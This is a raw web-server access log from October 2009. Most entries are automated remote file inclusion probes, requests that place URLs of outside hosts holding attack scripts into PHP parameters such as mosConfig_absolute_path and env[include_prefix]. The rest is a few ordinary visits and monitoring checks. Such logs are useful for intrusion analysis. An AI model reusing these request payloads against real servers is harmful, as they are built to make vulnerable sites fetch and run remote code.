69.64.75.54 - - [17/Oct/2009:01:35:39 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.64.75.54 - - [17/Oct/2009:01:35:43 -0400] "GET /logs/access_log.Q109090100%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
70.38.54.146 - - [17/Oct/2009:01:37:02 -0400] "GET /logs/error_log.Q109090400//include/admin.lib.inc.php?site_path=http://www.eggsactrace.com/mambo/safe.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
70.38.54.146 - - [17/Oct/2009:01:37:02 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.eggsactrace.com/mambo/safe.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
89.108.122.160 - - [17/Oct/2009:01:37:08 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:01:37:11 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:01:37:11 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:01:37:11 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:37:12 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:37:12 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
70.38.54.146 - - [17/Oct/2009:01:37:19 -0400] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://www.eggsactrace.com/mambo/safe.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
89.108.122.160 - - [17/Oct/2009:01:37:20 -0400] "GET /logs/error_log.Q109072700%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:01:37:23 -0400] "GET /logs/error_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:37:43 -0400] "GET /zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:37:43 -0400] "GET /logs/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:37:43 -0400] "GET /logs/access_log.Q109051200/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:37:48 -0400] "GET /logs/access_log.Q109051200%20%20/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:37:48 -0400] "GET /zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:37:48 -0400] "GET /logs/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:37:52 -0400] "GET /logs/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:37:52 -0400] "GET /zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:37:52 -0400] "GET /logs/access_log.Q109051200/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:38:03 -0400] "GET /logs/access_log.Q109051200%20%20/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:38:03 -0400] "GET /logs/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:38:03 -0400] "GET /zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
222.231.3.138 - - [17/Oct/2009:01:38:03 -0400] "GET /?custompluginfile[]=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.231.3.138 - - [17/Oct/2009:01:38:03 -0400] "GET /logs/access_log.Q109081800/?custompluginfile[]=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:38:05 -0400] "GET //?sourcedir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:38:05 -0400] "GET //?sourcedir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:38:05 -0400] "GET /logs/access_log.Q109052400%20%20//?sourcedir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:38:05 -0400] "GET /logs/access_log.Q109052400%20%20//?sourcedir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.231.3.138 - - [17/Oct/2009:01:38:03 -0400] "GET /logs/?custompluginfile[]=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:38:05 -0400] "GET /logs//?sourcedir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:38:05 -0400] "GET /logs//?sourcedir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:38:21 -0400] "GET /logs/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:38:21 -0400] "GET /logs/access_log.Q109051200/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:38:25 -0400] "GET /logs/access_log.Q109093000%20%20//?sourcedir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:38:28 -0400] "GET /logs/access_log.Q109093000%20%20//?sourcedir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:38:46 -0400] "GET /logs/access_log.Q109051200/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:38:46 -0400] "GET /logs/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:38:46 -0400] "GET /zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:39:25 -0400] "GET /logs/access_log.Q109053100/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:01:39:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
128.125.169.162 - - [17/Oct/2009:01:39:33 -0400] "GET /logs/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:39:33 -0400] "GET /zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:39:33 -0400] "GET /logs/access_log.Q109051200/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:39:34 -0400] "GET /logs/access_log.Q109053100%20%20/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:39:39 -0400] "GET /zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:39:39 -0400] "GET /logs/access_log.Q109053100/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:39:39 -0400] "GET /logs/access_log.Q109051200/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:39:39 -0400] "GET /logs/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:39:48 -0400] "GET /logs/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:39:48 -0400] "GET /zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:39:48 -0400] "GET /logs/access_log.Q109051200%20%20/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:40:06 -0400] "GET /logs/access_log.Q109053100%20%20/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:40:30 -0400] "GET /logs/access_log.Q109053100/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:40:46 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:40:46 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:40:46 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:40:47 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:40:47 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:40:47 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:40:52 -0400] "GET /logs/error_log.Q109072700%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:40:57 -0400] "GET /logs/error_log.Q109072700%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:41:28 -0400] "GET /logs/access_log.Q109051200/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:01:41:29 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:01:41:30 -0400] "GET /logs/error_log.Q109072700//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:41:36 -0400] "GET /zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:41:36 -0400] "GET /logs/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:01:41:41 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:01:41:53 -0400] "GET /logs/error_log.Q109072700//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:43:05 -0400] "GET //?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:43:05 -0400] "GET /logs/error_log.Q109100300%20%20//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:43:05 -0400] "GET /logs//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:43:09 -0400] "GET /logs/error_log.Q109071300%20%20//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:43:34 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:43:34 -0400] "GET /logs/error_log.Q109072700//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:01:43:42 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:01:43:49 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:01:43:49 -0400] "GET /logs/access_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:01:44:03 -0400] "GET /logs/error_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:44:06 -0400] "GET //?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:44:06 -0400] "GET /logs/error_log.Q109100300//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:44:06 -0400] "GET /logs//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:44:14 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:01:44:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.100.5.136 - - [17/Oct/2009:01:45:03 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.100.5.136 - - [17/Oct/2009:01:45:03 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.100.5.136 - - [17/Oct/2009:01:45:03 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.100.5.136 - - [17/Oct/2009:01:45:08 -0400] "GET /logs/error_log.Q109072700//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.100.5.136 - - [17/Oct/2009:01:45:16 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.100.5.136 - - [17/Oct/2009:01:45:16 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.100.5.136 - - [17/Oct/2009:01:45:16 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.100.5.136 - - [17/Oct/2009:01:45:21 -0400] "GET /logs/error_log.Q109072700//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
207.44.250.68 - - [17/Oct/2009:01:45:49 -0400] "GET /logs/access_log.Q109072500///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:45:54 -0400] "GET /logs/access_log.Q109053100/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:46:10 -0400] "GET //?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:46:10 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:46:10 -0400] "GET /logs//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
98.237.141.84 - - [17/Oct/2009:01:46:12 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://sz0092.ev.mail.comcast.net/zimbra/mail" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
125.251.147.194 - - [17/Oct/2009:01:46:27 -0400] "GET //?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:46:27 -0400] "GET /logs/error_log.Q109100300%20%20//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:46:27 -0400] "GET /logs//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:46:31 -0400] "GET //?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:46:31 -0400] "GET /logs//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:46:32 -0400] "GET /logs/error_log.Q109071300%20%20//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
98.237.141.84 - - [17/Oct/2009:01:47:33 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:34 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:34 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
81.214.169.114 - - [17/Oct/2009:01:47:36 -0400] "GET /?mosConfig_absolute_path=http://ddmalfa.cz/56.dat?a HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
125.251.147.194 - - [17/Oct/2009:01:47:45 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:47:45 -0400] "GET //?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:47:45 -0400] "GET /logs//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
207.44.250.68 - - [17/Oct/2009:01:47:46 -0400] "GET /logs/access_log.Q109072500///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:47:50 -0400] "GET //?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:47:50 -0400] "GET /logs/access_log.Q109100300//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:47:50 -0400] "GET /logs/error_log.Q109100300//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
98.237.141.84 - - [17/Oct/2009:01:47:41 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 73511 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
125.251.147.194 - - [17/Oct/2009:01:47:50 -0400] "GET /logs//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
